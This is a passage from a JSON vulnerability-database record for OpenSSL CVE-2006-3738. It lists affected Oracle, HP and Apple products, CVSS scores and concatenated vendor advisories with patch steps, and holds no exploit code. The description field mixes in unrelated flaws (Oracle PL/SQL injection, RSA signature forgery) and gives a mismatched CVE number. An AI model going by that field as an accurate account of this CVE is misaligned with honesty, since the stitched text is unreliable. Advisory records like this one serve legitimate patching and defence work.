            "model": "oracle9i standard edition fips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.5"
          },
          {
            "model": "oracle9i standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.5"
          },
          {
            "model": "oracle9i standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.4"
          },
          {
            "model": "oracle9i personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.8"
          },
          {
            "model": "oracle9i personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.7"
          },
          {
            "model": "oracle9i personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.6"
          },
          {
            "model": "oracle9i personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.0.5"
          },
          {
            "model": "oracle9i personal edition fips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.5"
          },
          {
            "model": "oracle9i personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.5"
          },
          {
            "model": "oracle9i personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.4"
          },
          {
            "model": "oracle9i enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.8.0"
          },
          {
            "model": "oracle9i enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.7.0"
          },
          {
            "model": "oracle9i enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.6.0"
          },
          {
            "model": "oracle9i enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.2.0.5"
          },
          {
            "model": "oracle9i enterprise edition fips",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.5"
          },
          {
            "model": "oracle9i enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.5"
          },
          {
            "model": "oracle9i enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.1.4"
          },
          {
            "model": "oracle8i standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.1.7.4"
          },
          {
            "model": "oracle8i enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "8.1.7.4.0"
          },
          {
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.3"
          },
          {
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.2"
          },
          {
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.1"
          },
          {
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.4.2"
          },
          {
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.5"
          },
          {
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.4"
          },
          {
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.3.1"
          },
          {
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.3"
          },
          {
            "model": "oracle10g standard edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.2"
          },
          {
            "model": "oracle10g personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.3"
          },
          {
            "model": "oracle10g personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.2"
          },
          {
            "model": "oracle10g personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.1"
          },
          {
            "model": "oracle10g personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.4"
          },
          {
            "model": "oracle10g personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.3.1"
          },
          {
            "model": "oracle10g personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.3"
          },
          {
            "model": "oracle10g personal edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.2"
          },
          {
            "model": "oracle10g enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.3"
          },
          {
            "model": "oracle10g enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.2"
          },
          {
            "model": "oracle10g enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.1"
          },
          {
            "model": "oracle10g enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.4"
          },
          {
            "model": "oracle10g enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.3.1"
          },
          {
            "model": "oracle10g enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.3"
          },
          {
            "model": "oracle10g enterprise edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.0.2"
          },
          {
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.3.4.0"
          },
          {
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.3.0.0"
          },
          {
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.2.2.0"
          },
          {
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.2.1.0"
          },
          {
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.2.0.2"
          },
          {
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.2.0.1"
          },
          {
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.2"
          },
          {
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.4.2"
          },
          {
            "model": "oracle10g application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.4.1"
          },
          {
            "model": "identity management 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.4.0.1"
          },
          {
            "model": "9i application server release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.0.2.2"
          },
          {
            "model": "enterprise manager grid control 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.2.1"
          },
          {
            "model": "enterprise manager grid control 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.5"
          },
          {
            "model": "enterprise manager grid control 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.4"
          },
          {
            "model": "enterprise manager grid control 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.3"
          },
          {
            "model": "e-business suite 11i cu2",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.5.10"
          },
          {
            "model": "e-business suite 11i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.5.10"
          },
          {
            "model": "e-business suite 11i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.5.9"
          },
          {
            "model": "e-business suite 11i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.5.8"
          },
          {
            "model": "e-business suite 11i",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.5.7"
          },
          {
            "model": "e-business suite",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.0"
          },
          {
            "model": "developer suite",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.1.2.0.2"
          },
          {
            "model": "developer suite",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.4.3"
          },
          {
            "model": "developer suite 6i",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "model": "application server release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "210.1.2.0.2"
          },
          {
            "model": "application server release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "210.1.2.0.1"
          },
          {
            "model": "application server release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "210.1.2.0.0"
          },
          {
            "model": "application server release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "29.0.2.3"
          },
          {
            "model": "application server 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.4.3"
          },
          {
            "model": "application server 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.4.2"
          },
          {
            "model": "application server 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.4.1"
          },
          {
            "model": "application server 10g",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.4"
          },
          {
            "model": "oracle for openview for linux ltu",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "0"
          },
          {
            "model": "oracle for openview",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.1.1"
          },
          {
            "model": "oracle for openview",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "8.1.7"
          },
          {
            "model": "oracle for openview",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "9.2"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.11"
          },
          {
            "model": "mac os server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.10"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.11"
          },
          {
            "model": "mac os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "apple",
            "version": "x10.4.10"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#221788"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "BID",
            "id": "22083"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/a:openssl:openssl",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:oracle:e-business_suite",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:oracle:http_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:misc:miraclelinux_asianux_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:sun:solaris",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux_appliance_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux_desktop",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux_fuji",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux_multimedia",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux_personal",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux_server",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux_wizpy",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:turbolinux:turbolinux_home",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/a:trendmicro:interscan_web_security_suite",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:hp:hp-ux",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:enterprise_linux",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:enterprise_linux_desktop",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:redhat:linux_advanced_workstation",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Tavis Ormandy taviso@gentoo.org Will Drewry wad@google.com",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2006-3738",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 10.0,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2006-3738",
                "impactScore": 10.0,
                "integrityImpact": "COMPLETE",
                "severity": "HIGH",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2006-3738",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#386964",
                "trust": 0.8,
                "value": "0.32"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#221788",
                "trust": 0.8,
                "value": "4.20"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#845620",
                "trust": 0.8,
                "value": "7.56"
              },
              {
                "author": "CARNEGIE MELLON",
                "id": "VU#547300",
                "trust": 0.8,
                "value": "2.53"
              },
              {
                "author": "NVD",
                "id": "CVE-2006-3738",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-200609-536",
                "trust": 0.6,
                "value": "CRITICAL"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#221788"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200609-536"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2006-000594"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Buffer overflow in the SSL_get_shared_ciphers function in OpenSSL 0.9.7 before 0.9.7l, 0.9.8 before 0.9.8d, and earlier versions has unspecified impact and remote attack vectors involving a long list of ciphers. The Oracle SYS.DBMS_AQ package is vulnerable to PL/SQL injection. This vulnerability may allow a remote, authenticated attacker to execute arbitrary PL/SQL commands on a vulnerable Oracle installation. OpenSSL Library utility functions 1 First, output a list of encryption algorithms used for communication as a readable character string. SSL_get_shared_ciphers() there is. SSL_get_shared_ciphers() There is a buffer overflow vulnerability in the processing of.OpenSSL Any code may be executed with the privileges of the application that uses it. Multiple RSA implementations fail to properly handle RSA signatures. This vulnerability may allow an attacker to forge RSA signatures. \nSuccessfully exploiting this issue may result in the execution of arbitrary machine code in the context of applications that use the affected library. Failed exploit attempts may crash applications, denying service to legitimate users. Oracle has released a Critical Patch Update advisory for January 2007 to address these vulnerabilities for supported releases. Earlier unsupported releases are likely to be affected by these issues as well. \nThe issues identified by the vendor affect all security properties of the Oracle products and present local and remote threats. Various levels of authorization are needed to leverage some of the issues, but other issues do not require any authorization. The most severe of the vulnerabilities could possibly expose affected computers to complete compromise. A flaw has also been reported in the\nBN_from_montgomery() function in crypto/bn/bn_mont.c when performing\nMontgomery multiplication. A local attacker could\nperform a side channel attack to retrieve the RSA private keys. rPath Security Advisory: 2006-0175-1\nPublished: 2006-09-28\nProducts: rPath Linux 1\nRating: Major\nExposure Level Classification:\n    Remote Deterministic Unauthorized Access\nUpdated Versions:\n    openssl=/conary.rpath.com@rpl:devel//1/0.9.7f-10.4-1\n    openssl-scripts=/conary.rpath.com@rpl:devel//1/0.9.7f-10.4-1\n\nReferences:\n    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\n    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\n    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\n    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\n    http://issues.rpath.com/browse/RPL-613\n\nDescription:\n    Previous versions of the openssl package are vulnerable to multiple\n    attacks. \n    In particular, any connection that the mysql daemon will accept\n    may be vulnerable.  In the default configuration of mysql, that\n    would be a local unauthorized access vulnerability, but mysql can\n    be configured to listen for network connections from remote hosts,\n    which would then enable remote unauthorized access.  Any program\n    that calls the SSL_get_shared_ciphers() function may be vulnerable. \n\n_______________________________________________\nFull-Disclosure - We believe in it. \nCharter: http://lists.grok.org.uk/full-disclosure-charter.html\nHosted and sponsored by Secunia - http://secunia.com/\n. ASN.1 Denial of Service Attack (1/2)\n\n     During the parsing of certain invalid ASN.1 structures an error\n     condition is mishandled. This can result in an infinite loop which\n     consumes system memory. The Common Vulnerabilities and Exposures\n     (CVE) project assigned the id CVE-2006-2937 [2] to the problem. ASN.1 Denial of Service Attack (2/2)\n\n     Certain types of public key can take disproportionate amounts of\n     time to process. This could be used by an attacker in a denial of\n     service attack. The Common Vulnerabilities and Exposures (CVE)\n     project assigned the id CVE-2006-2940 [3] to the problem. SSL_get_shared_ciphers() Buffer Overflow\n\n     A buffer overflow was discovered in the SSL_get_shared_ciphers()\n     utility function. The\n     Common Vulnerabilities and Exposures (CVE) project assigned the id\n     CVE-2006-3780 [4] to the problem. SSLv2 Client Crash\n \n     A flaw in the SSLv2 client code was discovered. The\n     Common Vulnerabilities and Exposures (CVE) project assigned the id\n     CVE-2006-4343 [5] to the problem. \n________________________________________________________________________\n\nReferences:\n  [0] http://www.openssl.org/news/secadv_20060928.txt \n  [1] http://www.openssl.org/\n  [2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2937\n  [3] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2940\n  [4] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3738\n  [5] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4343\n________________________________________________________________________\n\nFor security reasons, this advisory was digitally signed with the\nOpenPGP public key \"OpenPKG \u003copenpkg@openpkg.org\u003e\" (ID 63C4CB9F) of the\nOpenPKG project which you can retrieve from http://pgp.openpkg.org and\nhkp://pgp.openpkg.org. Follow the instructions on http://pgp.openpkg.org\nfor details on how to verify the integrity of this advisory. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c00849540\nVersion: 1\n\nHPSBUX02186 SSRT071299 rev.1 - HP-UX running Apache Remote Execution of Arbitrary Code, Denial of Service (DoS), Unauthorized Access\n\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible. \n\nRelease Date: 2007-01-17\nLast Updated: 2007-01-23\n\nPotential Security Impact: Remote execution of arbitrary code, Denial of Service (DoS), and unauthorized access. \n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with Apache running on HP-UX. These vulnerabilities could be exploited remotely to allow execution of arbitrary code, Denial of Service (DoS), or unauthorized access. \n\nReferences: CVE-2006-2940, CVE-2006-2937, CVE-2006-3738, CVE-2006-4343, CVE-2006-4339, CVE-2005-2969. \n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP-UX B.11.11, B.11.23, and B.11.31 running Apache-based Web Server prior to v.2.0.58.01\n\nBACKGROUND\n\nAFFECTED VERSIONS\n\nFor IPv4:\nHP-UX B.11.00\nHP-UX B.11.11\n===========\nhpuxwsAPACHE\naction: install revision A.2.0.58.01 or subsequent\nrestart Apache\nURL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\n\nFor IPv6:\nHP-UX B.11.11\n===========\nhpuxwsAPACHE,revision=B.1.0.00.01\nhpuxwsAPACHE,revision=B.1.0.07.01\nhpuxwsAPACHE,revision=B.1.0.08.01\nhpuxwsAPACHE,revision=B.1.0.09.01\nhpuxwsAPACHE,revision=B.1.0.10.01\nhpuxwsAPACHE,revision=B.2.0.48.00\nhpuxwsAPACHE,revision=B.2.0.49.00\nhpuxwsAPACHE,revision=B.2.0.50.00\nhpuxwsAPACHE,revision=B.2.0.51.00\nhpuxwsAPACHE,revision=B.2.0.52.00\nhpuxwsAPACHE,revision=B.2.0.53.00\nhpuxwsAPACHE,revision=B.2.0.54.00\nhpuxwsAPACHE,revision=B.2.0.55.00\nhpuxwsAPACHE,revision=B.2.0.56.00\nhpuxwsAPACHE,revision=B.2.0.58.00\naction: install revision B.2.0.58.01 or subsequent\nrestart Apache\nURL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\n\nHP-UX B.11.23\n===========\nhpuxwsAPACHE\naction: install revision B.2.0.58.01 or subsequent\nrestart Apache\nURL:http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\n\nEND AFFECTED VERSIONS\n\nRESOLUTION\n\nHP has made the following software updates available to resolve the issue. \nSoftware updates for the Apache-based Web Server are available from:\nhttp://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\n\nHP-UX B.11.00, B.11.11 and HP-UX B.11.23 require the Apache-based Web Server v.2.0.58.01 or subsequent. \n\nApache Update Procedure\n\nCheck for Apache Installation\n -----------------------------\nTo determine if the Apache web server from HP is installed on your system, use Software Distributor\u0027s swlist command. All three revisions of the product may co-exist on a single system. \nFor example, the results of the command swlist -l product | grep -I apache\nhpuxwsAPACHE B.2.0.55.00 HP-UX Apache-based Web Server\n\nStop Apache\n -------------\nBefore updating, make sure the previous Apache binary is stopped. If Apache is not stopped, the installation would be successful but the new version would be prevented from starting until a later time. \nAfter determining which Apache is installed, stop Apache with the following commands:\nfor hpuxwsAPACHE: /opt/hpws/apache[32]/bin/apachectl stop\n\nDownload and Install Apache\n --------------------------\nDownload Apache from Software Depot. http://h20293.www2.hp.com/cgi-bin/swdepot_parser.cgi/cgi/displayProductInfo.pl?productNumber=HPUXWSSUITE\nVerify successful download by comparing the cksum with the value specified on the installation web page. \nUse SD to swinstall the depot. Installation of this new revision of HP Apache over an existing HP Apache installation is supported, while installation over a non-HP Apache is NOT supported. \n\nRemoving Apache Installation\n ---------------------------\nThe potential vulnerability can also be resolved by removing Apache rather than installing a newer revision. To remove Apache use both Software Distributor\u0027s \"swremove\" command and also \"rm -rf\" the home location as specified in the rc.config.d file \"HOME\" variables. \n%ls /etc/rc.config.d | \\ grep apache hpapache2conf hpws_apache[32]conf\n\nMANUAL ACTIONS: Yes - Update plus other actions\nInstall the revision of the product. \n\nPRODUCT SPECIFIC INFORMATION\nHP-UX Security Patch Check: Security Patch Check revision B.02.00 analyzes all HP-issued Security Bulletins to provide a subset of recommended actions that potentially affect a specific HP-UX system. \nFor more information: http://software.hp.com/portal/swdepot/displayProductInfo.do?productNumber=B6834AA\n\nHISTORY: rev.1 - 23 January 2007 Initial Release\n\nThird Party Security Patches: Third party security patches which are to be installed on systems running HP software products should be applied in accordance with the customer\u0027s patch management policy. \n\nSupport: For further information, contact normal HP Services support channel. \n\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. \nTo get the security-alert PGP key, please send an e-mail message as follows:\n  To: security-alert@hp.com\n  Subject: get key\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA\u0026langcode=USENG\u0026jumpid=in_SC-GEN__driverITRC\u0026topiccode=ITRC\nOn the web page: ITRC security bulletins and patch sign-up\nUnder Step1: your ITRC security bulletins and patches\n  - check ALL categories for which alerts are required and continue. \nUnder Step2: your ITRC operating systems\n  - verify your operating system selections are checked and save. \n\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\nLog in on the web page: Subscriber\u0027s choice for Business: sign-in. \nOn the web page: Subscriber\u0027s Choice: your profile summary - use Edit Profile to update appropriate sections. \n\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\n\n* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:\n\nGN = HP General SW\nMA = HP Management Agents\nMI = Misc. 3rd Party SW\nMP = HP MPE/iX\nNS = HP NonStop Servers\nOV = HP OpenVMS\nPI = HP Printing \u0026 Imaging\nST = HP Storage SW\nTL = HP Trusted Linux\nTU = HP Tru64 UNIX\nUX = HP-UX\nVV = HP VirtualVault\n\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions. \n\n\"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user\u0027s use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement.\"\n\n\\xa9Copyright 2007 Hewlett-Packard Development Company, L.P. \n\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided \"as is\" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP 8.1\n\niQA/AwUBRbc7fOAfOvwtKn1ZEQJs6ACg9AMS2ZtEgsaZh7T9e8Q0OgyfmEQAni1I\notH/juFiPayhwdxQwX1pZwdm\n=e4BA\n-----END PGP SIGNATURE-----\n. \nHP Secure Web Server (SWS) for OpenVMS (based on Apache) V2.1-1 and earlier. \n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n  Reference              Base Vector             Base Score\nCVE-2002-0839    (AV:L/AC:L/Au:N/C:C/I:C/A:C)        7.2\nCVE-2002-0840    (AV:N/AC:M/Au:N/C:P/I:P/A:P)       